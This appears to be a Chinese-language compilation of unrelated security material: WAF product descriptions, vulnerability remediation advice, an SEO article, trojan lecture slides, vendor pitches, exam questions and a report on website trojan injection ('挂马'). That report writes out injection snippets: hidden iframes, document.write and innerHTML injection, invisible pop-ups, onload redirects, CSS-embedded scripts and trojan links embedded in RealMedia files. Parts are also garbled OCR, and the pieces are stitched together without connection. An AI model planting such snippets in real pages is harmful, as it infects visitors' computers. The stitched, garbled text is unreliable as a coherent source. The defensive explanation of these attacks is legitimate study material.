网站挂马及检测技术
WAF-web防御系统
WEB应用防护系统蓝盾信息安全技术股份有限责任公司2014年7月3日目录1.第一章WAF (2)1.1 产生背景 (2)1.2 应用功能 (2)审计设备 (2)访问控制设备 (3)架构/网络设计工具 (3)WEB应用加固工具 (3)1.3 特点 (3)异常检测协议 (3)增强的输入验证 (4)及时补丁 (4)基于规则的保护和基于异常的保护 (5)状态管理 (5)其他防护技术 (5)2.第二章BD-WAF (6)2.1蓝盾WEB应用防火墙简介 (6)2.2 BD-WAF 系统具备以下功能特性 (6)2.3 BD-WAF 的详细参数 (7)3.第三章绿盟WAF (11)3.1 绿盟W AF简介 (11)3.2 产品特点: (11)3.2 详细招标参数 (12)4.附录 (17)附录1. W AF(WEB应用防火墙)技术比较表 (17)附录2. 在选择W AF产品时,建议参考以下步骤: (18)第一章WAFWeb应用防护系统(也称:网站应用级入侵防御系统。
英文:Web Application Firewall,简称:WAF)。
利用国际上公认的一种说法:Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。
1.1 产生背景当WEB应用越来越为丰富的同时,WEB 服务器以其强大的计算能力、处理性能及蕴含的较高价值逐渐成为主要攻击目标。
SQL注入、网页篡改、网页挂马等安全事件,频繁发生。
2007年,国家计算机网络应急技术处理协调中心(简称CNCERT/CC)监测到中国大陆被篡改网站总数累积达61228个,比2006年增加了1.5倍。
其中,中国大陆政府网站被篡改各月累计达4234个。
企业等用户一般采用防火墙作为安全保障体系的第一道防线。
但是,在现实中,他们存在这样那样的问题,由此产生了WAF(Web应用防护系统)。
Web应用防护系统(Web Application Firewall, 简称:WAF)代表了一类新兴的信息安全技术,用以解决诸如防火墙一类传统设备束手无策的Web应用安全问题。
常见安全漏洞的处理及解决方法
相关名词解释、危害与整改建议1、网站暗链名词解释“暗链”就是看不见的网站链接,“暗链”在网站中的链接做的非常隐蔽,短时间内不易被搜索引擎察觉。
它和友情链接有相似之处,可以有效地提高PR值。
但要注意一点PR值是对单独页面,而不是整个网站。
危害:网站被恶意攻击者插入大量暗链,将会被搜索引擎惩罚,降低权重值;被插入大量恶意链接将会对网站访问者造成不良影响;将会协助恶意网站(可能为钓鱼网站、反动网站、赌博网站等)提高搜索引擎网站排名。
可被插入暗链的网页也意味着能被篡改页面内容。
整改建议:加强网站程序安全检测,及时修补网站漏洞;对网站代码进行一次全面检测,查看是否有其余恶意程序存在;建议重新安装服务器及程序源码,防止无法到检测深度隐藏的恶意程序,导致重新安装系统后攻击者仍可利用后门进入。
2、网页挂马名词解释网页挂马是通过在网页中嵌入恶意程序或链接,致使用户计算机在访问该页面时触发执行恶意脚本,从而在不知情的情况下跳转至“放马站点”(指存放恶意程序的网络地址,可以为域名,也可以直接使用IP 地址),下载并执行恶意程序.危害:利用IE浏览器漏洞,让IE在后台自动下载黑客放置在网站上的木马并运行(安装)这个木马,即这个网页能下载木马到本地并运行(安装)下载到本地电脑上的木马,整个过程都在后台运行,用户一旦打开这个网页,下载过程和运行(安装)过程就自动开始,从而实现控制访问者电脑或安装恶意软件的目的。
整改建议:加强网站程序安全检测,及时修补网站漏洞;对网站代码进行一次全面检测,查看是否有其余恶意程序存在;建议重新安装服务器及程序源码,防止有深度隐藏的恶意程序无法检测到,导致重新安装系统后攻击者仍可利用后门进入.3、SQL注入SQL注入就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。
危害:可能会查看、修改或删除数据库条目和表。
严重的注入漏洞还可能以当然数据库用户身份远程执行操作系统命令。
SEO必备的网站站长工具
(讯)作为SEO我们每天都要进行数据分析,而进行数据分析的方法就是通过一些常用的SEO工具来进行总结和统计来进行。
现在互联网上的站长工具很多,建议大家多用百度或者谷歌官方的工具。
现在无论是百度还是谷歌都是支持SEO 的,所以他们针对SEO提供的站长工具也越来越人性化,用这些官方的工具将会对我们SEO提供更可靠的理论和技术支撑。
比如我们下面要讲到的几个搜索引擎官方工具。
1.谷歌网站站长工具。
谷歌站长工具是谷歌官方的为站长提供优化检测的内部工具。
他的功能包括为站长及时发送邮件,如果我们的网站服务器或者空间出问题,或者我们网站中毒或者挂马,谷歌会以邮件的形式发给我们。
也就是说通过这个我们可以很清楚自己的服务器或者空间的稳定性,有的小型空间供应商经常服务器故障,而他们为了不引起客户的投诉,一般都会在晚上进行,而我们是不知道的,通过这个邮件,我们就能知道网站空间出问题的频率。
这个网站中毒或者挂马提醒也是非常利于我们进行网站安全监控的,因而非常方便。
谷歌站长工具可以提供提交网站地图让搜索引擎更快地抓取我们的最新内容。
另外它还提供了网站站内故障分析,用它可以为我们的网站体检,其中包括死链接检测、收录状况、长标题和重复标题的检测、网站稳定性的检测。
以下为谷歌站长工具的功能页面:2.pagespeed工具。
这个太强大了,强烈建议大家进行安装。
pagespeed是基于谷歌开发的一款工具,他主要是用来检查影响网站打开速度的工具,他们会对我们的图片进行无损压缩,并且可以将压缩好的图片提供给我们,我的一个led广告车的网站就是这样,这个工具把我网站中led广告车的车型图片进行了无损压缩,大大地提高了我网站的打开速度。
并且它还可以将我led广告车的图片设置成合理的像素大小,为我节省了很多空间。
还可以提示我们网站中哪些css要进行合并等等,大家可以去安装这个工具,让你的网站打开速度飞起来吧!以下为pagespeed的优化演示图片:3.百度统计工具。
第5章 特洛伊木马
bind( )
服务请求 sendto( )
处理服务请求
sendto( ) close( )
服务应答
readfrom( ) close( )
无连接套接应用程序时序图
服务器
socket( ) bind( ) listen( )
客户机
accept( )
阻塞,等待客户数据
socket( )
恶意代码与计算机病毒 -原理、技术和实践
技术进展
历史上概括为4个阶段: − 第四阶段在进程隐藏方面做了非常大的改动, 采用了内核插入式的嵌入方式,利用远程插入 线程技术嵌入DLL线程,或者挂接PSAPI实现木 马程序的隐藏。即使在Windows NT/2K下, 这些技术都达到了良好的隐藏效果。 − 相信,第五代木马的技术更加先进。
恶意代码与计算机病毒 -原理、技术和实践
Server端功能——实现list命令
CFileFind finder; BOOL bWorking = finder.FindFile("*.*"); while (bWorking) //循环得到下一层文件或目录 { bWorking = finder.FindNextFile(); if ( finder.IsDots() || finder.IsDirectory() ){ strResult = "Dire: "; }else{ strResult = "File: "; } strResult += finder.GetFileName(); strResult += "\n"; } SendText( strResult, pSocket ); //返回Return_Text变量的内容
高速网络环境下恶意代码的监测技术
6 %。这类病 毒通 过网络传播,传播速度极快 , 以控制。一种新病毒 出现后,可 以迅速通过互联 网传播到世界各地。如 “ 8 难 爱虫”
病毒 在一 、 两天内迅速传 播到世界 的主要计算机网络, 造成欧、 并 美国家的计算机 网络瘫痪 , 冲击波”在一两个小时便横跨几大洲。 “ 网络病毒一旦在网络 中传播 、 蔓延 , 很难控制, 它们侵害的对象不但是被传播 者, 还侵害网络本身, 常能造成阻塞网络甚 至网络瘫痪。
当前 ,计 算机病 毒木马本土化趋势加剧 ,变种速 度更快、变化 更多,潜 伏性 和隐蔽性 增强 、识 别更难 ,与防病毒 软件的对抗能 力更 强,攻击 目标 明确 ,趋, H的明显。因此 ,计算 机用户账 号密码 被盗现象 日益增多。病毒木 马传播 的主要 渠道是网页挂马和 I J
移动存储介质,其ห้องสมุดไป่ตู้中网页挂 马出现复合化趋 势。 …
当前 的计 算 机 病 毒 和 黑 客 攻 击 行 为 具 有 以 下特 点 。
11具备 网络特性是 当前计 算机病毒和黑客行 为的第一大特征 .
当前 .如蠕虫 、木 马、黑客 、脚 本等类 型的病毒 ,它们都具 有 网络特性 ,通 过网络进行传 播并实施侵 害行为。从瑞 星公 司 在 20 0 3年十一月亚洲反病 毒大会上发布的 《 0 3年亚洲反病毒情况 自皮书》中的统计数据上看,这 三类 病毒占了所有病 毒总数 的 20
e c r ao a h a e fnai o db c uie h o g t i e h olg . tc n o Ze o Co t a ur p le tonc ul ea q r dt r u h hstc n o y A h olgyof r pyda c pt ei a p idi e a s n
深信服上网行为管理和入侵检测网关解决方案1.16
深信服上网行为管理和上网优化网关(入侵检测)解决方案深信服科技有限公司20XX年XX月XX日一.上网行为管理1.产品描述:随着互联网的普及,组织机构的业务几乎都依托于互联网进行着。
ERP、CRM、OA、电子商务、视频会议等系统已成为各组织机构在建设网络的基础设施,来为公司业务建立一个信息化平台。
但是在一个组织机构内部的网络,除了这些关键业务系统外,P2P下载、网络炒股、游戏、视频等非关键业务应用同样共存着,形成了复杂的网络应用“脉络”。
网络速度慢,正常业务受到影响,如何来解决问题呢?扩张带宽,将原有的10M扩张到20M?扩张带宽,IT部需要向公司申请一笔较大的经费,财务部需要从其他部门的预算中挤出30W左右的资金,难度大,周期长,有风险。
但是扩张带宽后,网络速度慢的问题是否会从根本上解决呢?而P2P对于带宽资源的吞噬是一方面,另外一方面P2P会产生大量的连接会话,会对于网络核心以及互联网出口设备都会产生比较大的压力,导致相关设备负载过高,导致设备新建会话的速度变慢从而影响网路速度。
由此看来,组织机构若不能应付P2P应用大量吞噬带宽的现象,单纯通过扩张带宽,也只能获得一时的效果,仍然不能从根本上解决网络速度慢的问题。
网络偶然发生拥堵,很常见,但如果网络开始遭遇频繁的数据重发和拥堵,有一件事情是确定的——如果不将网络拥堵处理妥当,它只会变得更糟。
组织单位面对来自带宽效率、工作效率、泄密、法律和网络安全等风险问题时,往往需要一套完善的可靠的上网行为管理解决方案。
3.相关型号及参数;推荐型号:AC1200-HY价格:36500I.性能参数二.上网优化网关(入侵检测系统)1.产品描述当越来越多的公司将其核心业务向互联网转移的时候,网络安全作为一个无法回避的问题呈现在人们面前。
传统上,公司一般采用防火墙作为安全的第一道防线。
而随着攻击者知识的日趋成熟,攻击工具与手法的日趋复杂多样,单纯的防火墙策略已经无法满足对安全高度敏感的部门的需要,网络的防卫必须采用一种纵深的、多样的手段。
弱口令解决方案
弱口令解决方案篇一:常见终端问题解决方案和整改方法问题一:猜测出远程可登录的SMB/Samba用户名口令弱密码示例:扫描原理:通过SMB协议,匹配弱密码字典库,对终端用户和口令,进行扫描。
产生原因:终端存在SMB自建共享或者开启SMB默认共享导致,同时系统用户存在弱口令。
验证方法:(1)使用命令net use \\ip\ipc$ password /u:username进行弱密码登录尝试,若登录成功,则该账号一定存在。
(2)该账号可能在―计算机管理‖中不存在,因为该账号可能为克隆账号、隐藏账号或者某程序产生的账号。
(3)也存在计算机已经中毒的可能。
《注释》判断计算机是否存在隐藏账号的方法:1. 打开注册表编辑器,展开HKEY_LOCAL_MACHINE\SAM\SAM,修改SAM权限为administrator完全控制。
2. 按F5刷新注册表,展开HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\u ser\names,对比用户列表和计算机管理中的用户列表是否相同,如果存在多余的,则为隐藏账号。
加固方法:杀毒使用net use \\ip\ipc$ /del,进行删除如果可以关闭Server服务,建议关闭Server服务更改计算机系统用户密码,设置足够密码强度的口令关闭自建共享问题二:SMB漏洞问题漏洞示例:利用SMB会话可以获取远程共享列表主机SID信息可通过SMB远程获取利用主机SID可以获取本地用户名列表扫描原理:通过SMB服务(主要端口为135.445)对被扫描系统,进行信息获取产生原因:终端存在SMB自建共享或者开启SMB默认共享导致。
加固方法:如果可以关闭Server服务,建议关闭Server服务修改本地安全策略,如:? 利用SMB会话可以获取远程共享列表–启用―不允许匿名列举SAM帐号和共享‖ ? 主机SID信息可通过SMB远程获取–更改―对匿名连接的额外限制‖为―没有显式匿名权限就无法访问‖? 利用主机SID可以获取本地用户名列表–启用―允许匿名SID/名称转换‖ 通过防火墙过滤端口135/TCP、139/TCP、445/TCP、135/UDP、137/UDP、138/UDP、445/UDP,过滤方法如下:进入―控制面板-系统和安全-windows 防火墙-左侧高级设置‖,打开―高级安全防火墙‖,右键―入站规则‖-新建规则。
计算机三级信息安全技术第六套
下列关于密码技术的描述中,错误的是()。
A) 传统密钥系统的加密密钥和解密密钥相同B) 公开密钥系统的加密密钥和解密密钥不同C) 消息摘要适合数字签名但不适合数据加密D) 数字签名系统一定具有数据加密功能数字签名是通过密码技术对电子文档的电子形式的签名,并非是书面签名的数字图像化。
它类似于手写签名或印章,也可以说它就是电子印章。
我们对一些重要的文件进行签名,以确定它的有效性。
数字签名的目的就是要保证文件的真实性,防止签名者抵赖。
对文件进行了签名说明签名者认可了这份文件。
所以数字签名系统不一定具有数据加密功能,故D选项错误。
用于验证消息完整性的是()。
A) 消息摘要B) 数字签名C) 身份认证D) 以上都不是消息摘要(Message Digest)又称为数字摘要(Digital Digest)。
它是一个唯一对应一个消息或文本的固定长度的值,它由一个单向Hash加密函数对消息进行作用而产生。
如果消息在途中改变了,则接收者通过对收到消息的新产生的摘要与原摘要比较,就可知道消息是否被改变了。
因此消息摘要保证了消息的完整性。
故选择A选项。
下列选项中,属于单密钥密码算法的是()。
A) DES算法B) RSA算法C) ElGamal算法D) Diffie-Hellman算法DES算法为密码体制中的对称密码体制,又被称为美国数据加密标准,是1972年美国IBM公司研制的对称密码体制加密算法。
明文按64位进行分组,密钥长64位,密钥事实上是56位参与DES运算(第8、16、24、32、40、48、56、64位是校验位,使得每个密钥都有奇数个1)分组后的明文组和56位的密钥按位替代或交换的方法形成密文组的加密方法。
单秘钥加密算法是指加密密钥能从解密密钥中推算出来,故选择A选项。
USB Key身份认证采用软硬件相结合、一次一密的强双因子认证模式。
它是一种USB接口的硬件设备,它内置单片机或智能卡芯片,可以存储用户的密钥或数字证书,利用USB Key内置的密码学算法实现对用户身份的认证,有两种应答模式:基于挑战/应答的认证模式和基于PKI体系的认证模式。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
挂马与检测技术报告什么是挂马?所谓的挂马,就是黑客通过各种手段,包括SQL注入,敏感文件扫描,服务器漏洞,程序0day, 等各种方法获得管理员账号,然后登陆后台,通过数据库备份/恢复或者上传漏洞获得一个webshell。
利用获得的webshell修改页面的容,向页面中加入恶意转向代码。
也可以直接通过弱口令获得服务器或者FTP,然后直接对页面直接进行修改。
当你访问被加入恶意代码的页面时,你就会自动的访问被转向的地址或者下载木马病毒。
挂马的危害危害和应用的普及程度有关,上网人人都会,也就是说,人人都可能中毒。
据金山毒霸安全实验室统计,每天有数百万次浏览与挂马网页有关,中毒概率在20%-50%之间。
很多游戏被挂马,黑客目的就是盗取浏览该玩家的游戏账号,而那些大型被挂马,则是为了搜集大量的肉鸡。
被挂马不仅会让自己的失去信誉,丢失大量客户,也会让我们这些普通用户陷入黑客设下的陷阱,沦为黑客的肉鸡。
如果不小心进入了已被挂马的,则会感染木马病毒,以致丢失大量的宝贵文件资料和账号密码,其危害极大。
挂马泛滥的原因利。
病毒木马黑色产业链有丰厚的利润,去年警方抓获的大小姐系列木马案,犯罪集团3个月获得非常收益3000万。
网络应用越普及,黑色产业链的从业者收益也就越高。
挂马围哪些容易被挂马呢?越是流量高的对黑客越有吸引力,黑客攻破一个管理上有漏洞并且流量很高的,一天就可以感染数百万人。
那些与公共事业密切相关的,比如政府机关的,,视频,聊天交友,提供盗版软件破解工具的最容易被入侵,几乎每周出现的热点网络事件都被攻击者利用,网民一不小心就会受热门事件吸引中招。
挂马的常见方式1.框架挂马<iframe src=地址 width=0 height=0></iframe>其中“地址”处可以输入恶意等。
属性为0意味着该框架是不可见的,受害者若不查看源代码很难发现网页木马。
这个方法也是挂马最常用的一段代码,但是随着管理员和广大网民安全意识的提高,只要在源代码中搜索iframe这个关键字,就很容易找到网页木马的源头。
2.js文件挂马只要是JS文件,都可以通过被恶意修改从而被挂上恶意代码,一般被全站引用的JS 代码最容易被挂木马,检测我们可以查看JS代码的左边或下边,坏人很喜欢将恶意代码与正常代码间用很多空格或回车来进行隐藏,所以要多看看JS代码页面有没有被故意拉长等。
相比iframe这个标签,<SCRIPT src="xx.js" type=text/javascript>这段代码就显得更加隐蔽,因为几乎95%的网页中都会出现类似的script 标签。
利用js引入网页木马也有多种方法:在js中直接写出框架网页木马示例代码如下:document.write("<iframe width='0' height='0' src='网页木马地址'></iframe>");指定language的属性为"JScript.Encode"还可以引入其他扩展名的js代码,这样就更加具有迷惑性,示例代码如下:<SCRIPT language="JScript.Encode" src=. xxx./mm.jpg></script>;利用js更改body的innerHTML属性,引入网页木马如果对容进行编码的话,不但能绕过杀毒软件的检测,而且增加了解密的难度,示例代码如下:op.document.body.innerHTML=top.document.body.innerHTML+'\r\n<iframe src="网页木马地址/%22%3E%3C/iframe%3E';利用JavaScript的window.open方法打开一个不可见的新窗口示例代码如下:<SCRIPT language=javascript>window.open("网页木马地址","","toolbar=no, location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1" );</script>;利用URL欺骗示例代码如下:a href=".163.(/迷惑用户的地址,显示这个地址指向木马地址)" onMouseOver="_163_(); return true;"> 页面要显示的正常容</a>:<SCRIPT Language="JavaScript">function _163_ (){var url="网页木马地址";open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=n o,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10" );}</SCRIPT>3.body挂马使用如下代码,就可以使网页在加载完成的时候跳转到网页木马的网址<body onload="window.location='网页木马地址';"></body>。
4.css中挂马利用层叠样式表CSS引入js,从而引入网页木马,示例代码如下:body{background-image:url('javascript:document.write("<scriptsrc=/muma.js></script>")')}这种方式比较难发现。
5.图片伪装随着防毒技术的发展,黑客手段也不停地更新,图片木马技术逃避杀毒监视的新技术,攻击者将类似: .xxx./test.htm中的木马代码植入到test.gif图片文件中,这些嵌入代码的图片都可以用工具生成,攻击者只需输入相关的选项就可以了,如图3。
图片木马生成后,再利用代码调用执行,是比较新颖的一种挂马隐蔽方法,实例代码如:<html><iframe src=".xxx./test.htm" height=0 width=0> </iframe><img src=".xxx./test.jpg"></center></html>注:当用户打开www.xxx./test.htm是,显示给用户的是www.xxx./test.jpg,而www.xxx./test.htm网页代码也随之运行。
6.利用隐藏的分割框架引入网页木马示例代码如下:<frameset rows="444,0" cols="*"><frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0"><frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0"></frameset>7.在swf中挂马网上有一些swf挂马的工具,可以用工具替换原来网页中的swf或单独把swf发给对方,一可以单独作一个可显示swf页的网页。
在网页中插入swf的语法一般格式为:<OBJECTclassid=clsid:D27CDB6E-AE6D-11cf-96B8-0codebase=download.macromedia./pub/shockwave/cabs/flash/swflash.cab#version=5.0.0.0 WIDTH=760 NAME=quality VALUE=high><EMBEDsrc=/xxx.swf”quality=highpluginspage=.macromedia./shockwave/download/index.cgi?P1_Prod_Version=Shockwave Flashtype=application/x-shockwave-flash width=760 height=60></EMBED></OBJECT>8.在影音文件中挂马所需工具是RealMedia Editor,打开工具后,然后依次选择“文件”-“打开Real媒体文件”,然后选择需要编辑的视频文件,其格式必须是RealOne公司的以RM或 RMVB为扩展名的文件。
接着,新建一个文本,在里面输入u 00:00:10:0 00:00:30.0&&_rpexternal& .xxx./horse.htm ;(00:00:10.0就是发生第一事件的时间,这里是让计算机弹出网页;00:00:30.0同样,这是第二次发生的时间,在0时0分第30秒0微妙时弹出窗口;而后面的URL地址就是连接指定的木马地址。
)输入完毕后并保存,然后依次选择“工具”-“合并事件”,导入刚才的文本。
当合并完成后,依次选择“文本”-“Real文件另存为”,保存好即可。
最后把生成的视频文件发布网上,当对方观看同时就会连接到你指定的木马地址。
9.通过钓鱼挂马黑客伪造,并在钓鱼上插入恶意代码下载木马。
10.ARP挂马并不需要真正攻陷目标:知名通常防护严密。
ARP欺骗:对同一以太网网段中,通过ARP欺骗方法进行中间人攻击,可劫持指定网络流量并进行任意修改ARP欺骗挂马:在Web请求反馈页面中插入iframe等重定向代码,从而使得目标被“虚拟”挂马挂马的检测方式1.特征匹配文本文件型病毒的特征码是从它的代码中提取一处或多处此病毒特有的字符串作为病毒文件的特征,只要这些字符串稍有变化,病毒的特征也就变化了,则必须增加病毒的特征记录。